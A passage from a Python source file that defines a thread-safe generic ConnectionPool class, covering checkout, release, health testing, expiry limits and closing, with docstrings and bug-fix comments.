    It can be called as follows:

        pool = ConnectionPool(create=redis.Redis)

    You can also specify the create call by lambda:

        pool = ConnectionPool(create=lambda: redis.Redis(host="127.0.0.1"))

    Or through functools.partial:

        from functools import partial
        pool = ConnectionPool(create=partial(redis.Redis, host="127.0.0.1"))
    """

    def __init__(self,
                 create: Callable[[], _T],
                 destroy_function: Callable[[_T], None] = None,
                 checkout_function: Callable[[_T], None] = None,
                 test_function: Callable[[_T], bool] = None,
                 max_size: int = 10, max_usage: int = 0,
                 ttl: int = 0, idle: int = 60,
                 block: bool = True) -> None:
        """Initialization parameters

        create: must be a callback function producing a new connection
        destroy_function: optional, called with the raw connection on destruction
        checkout_function: optional, called with the raw connection on checkout
        test_function: optional, health test run on checkout and release
        max_size: maximum number of connections; 0 means unlimited (not recommended)
        max_usage: uses allowed per connection before it is released/closed (0 = unlimited)
        ttl: connection lifetime in seconds before it is released/closed (0 = unlimited)
        idle: idle seconds after which the connection is released/closed (0 = unlimited)
        block: when the pool is full, block waiting for a release (True) or
               raise TooManyConnections (False)
        """
        if not callable(create):
            raise ValueError('"create" argument is not callable')
        self._create = create
        self._destroy_function = destroy_function
        self._checkout_function = checkout_function
        self._test_function = test_function
        self._max_size = int(max_size)
        self._max_usage = int(max_usage)
        self._ttl = int(ttl)
        self._idle = int(idle)
        self._block = bool(block)
        self._lock = threading.Condition()
        self._pool = queue.Queue()
        self._size = 0
        # id(raw connection) -> WrapperConnection.
        # BUGFIX: this used to be a class attribute, so every pool instance
        # shared (and leaked into) one wrapper map; it is now per-instance.
        self.__wrappers = {}

    def item(self) -> WrapperConnection[_T]:
        """Check out a connection wrapper; meant for the ``with`` statement:

            pool = ConnectionPool(create=redis.Redis)
            with pool.item() as redis:
                redis.set("foo", "bar")
        """
        self._lock.acquire()
        try:
            # Wait until a pooled connection exists or there is room to
            # create a new one (unless configured as non-blocking).
            while self._max_size and self._pool.empty() and self._size >= self._max_size:
                if not self._block:
                    raise TooManyConnections("Too many connections")
                self._lock.wait()  # Wait for an idle connection / freed capacity
            try:
                wrapped = self._pool.get_nowait()  # Get one from the free connection pool
                # Test the connection before handing it out.
                try:
                    self._test(wrapped)
                except Expired as ex:  # connection was not healthy
                    LOG.info("Connection %s was expired on checkout", wrapped, exc_info=ex)
                    self._destroy(wrapped, f"Expired on checkout: {ex}")
                    # Recursion is safe: the Condition's underlying lock is
                    # reentrant. The bad connection is gone; start over.
                    return self.item()
            except queue.Empty:  # no connection in pool
                wrapped = None
            if wrapped is None:
                try:
                    wrapped = self._wrapper(self._create())  # Create new connection
                    LOG.debug("Connection %s created", wrapped)
                    self._size += 1
                except Exception as ex:
                    raise ConnectionInitializationException("A new connection for the pool could not be created.") from ex
            else:
                LOG.info("Connection %s will be checked out from the pool", wrapped)
        finally:
            self._lock.release()
        # NOTE(review): if checkout_function raises, the connection is neither
        # pooled nor destroyed while _size still counts it — pre-existing
        # behavior, kept as-is.
        if self._checkout_function:
            self._checkout_function(wrapped.connection)
        return wrapped.using()

    def release(self, conn):
        """Return a connection to the pool.

        If the connection exceeded its usage/ttl/idle limits or fails the
        health test, it is destroyed instead of being pooled.
        """
        self._lock.acquire()
        try:
            # BUGFIX: the wrapper lookup now happens inside try/finally so an
            # exception here can no longer leave the lock permanently held.
            wrapped = self._wrapper(conn)
            try:
                self._test(wrapped)
            except Expired as ex:
                # _destroy() wakes waiting threads so a blocked item() can
                # create a replacement connection.
                self._destroy(wrapped, f"Expired on release: {ex}")
            else:
                LOG.debug("Connection %s will be released into the pool", wrapped)
                self._pool.put_nowait(wrapped)
                # BUGFIX: notify_all() — notifyAll() is a deprecated alias.
                self._lock.notify_all()  # Notify threads waiting for an idle connection
        finally:
            self._lock.release()

    def _destroy(self, wrapped, reason):
        """Destroy a connection. The caller must hold self._lock."""
        LOG.debug("Connection %s will be destroyed. Reason: %s", wrapped, reason)
        if self._destroy_function is not None:
            self._destroy_function(wrapped.connection)
        self._unwrapper(wrapped)
        self._size -= 1
        # BUGFIX: capacity was just freed; wake any thread blocked in item()
        # waiting for room — previously such a thread was never notified on
        # this path and could wait forever.
        self._lock.notify_all()

    def _wrapper(self, conn: _T) -> WrapperConnection[_T]:
        """Return the cached WrapperConnection for a raw connection,
        creating and caching one if needed."""
        if isinstance(conn, WrapperConnection):
            return conn
        _id = id(conn)
        if _id not in self.__wrappers:
            self.__wrappers[_id] = WrapperConnection(self, conn)
        return self.__wrappers[_id]

    def _unwrapper(self, wrapped):
        """Drop a wrapper from the cache and reset its statistics."""
        if not isinstance(wrapped, WrapperConnection):
            return
        _id = id(wrapped.connection)
        wrapped.reset()
        del wrapped
        if _id in self.__wrappers:
            del self.__wrappers[_id]

    def _test(self, wrapped):
        """Test availability of the connection; raise an Expired subclass
        when it is no longer usable."""
        if self._max_usage and wrapped.usage >= self._max_usage:
            raise UsageExceeded("Usage exceeds %d times" % self._max_usage)
        if self._ttl and (wrapped.created + self._ttl) < time.time():
            raise TtlExceeded("TTL exceeds %d secs" % self._ttl)
        if self._idle and (wrapped.last + self._idle) < time.time():
            raise IdleExceeded("Idle exceeds %d secs" % self._idle)
        if self._test_function:
            try:
                is_healthy = self._test_function(wrapped.connection)
            except Exception as ex:
                raise Unhealthy("Connection test determined that the connection is not healthy by exception") from ex
            if not is_healthy:
                raise Unhealthy("Connection test determined that the connection is not healthy")

    def close(self):
        """Destroy every idle pooled connection.

        NOTE(review): checked-out connections are not tracked here, so
        q.get(timeout=10) can block (holding the lock) when fewer than
        self._size connections are idle — pre-existing behavior.
        """
        self._lock.acquire()
        try:
            q = self._pool
            for _ in range(0, self._size):
                try:
                    self._destroy(q.get(timeout=10), "Pool closing")
                except queue.Empty:
                    pass
        finally:
            self._lock.release()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.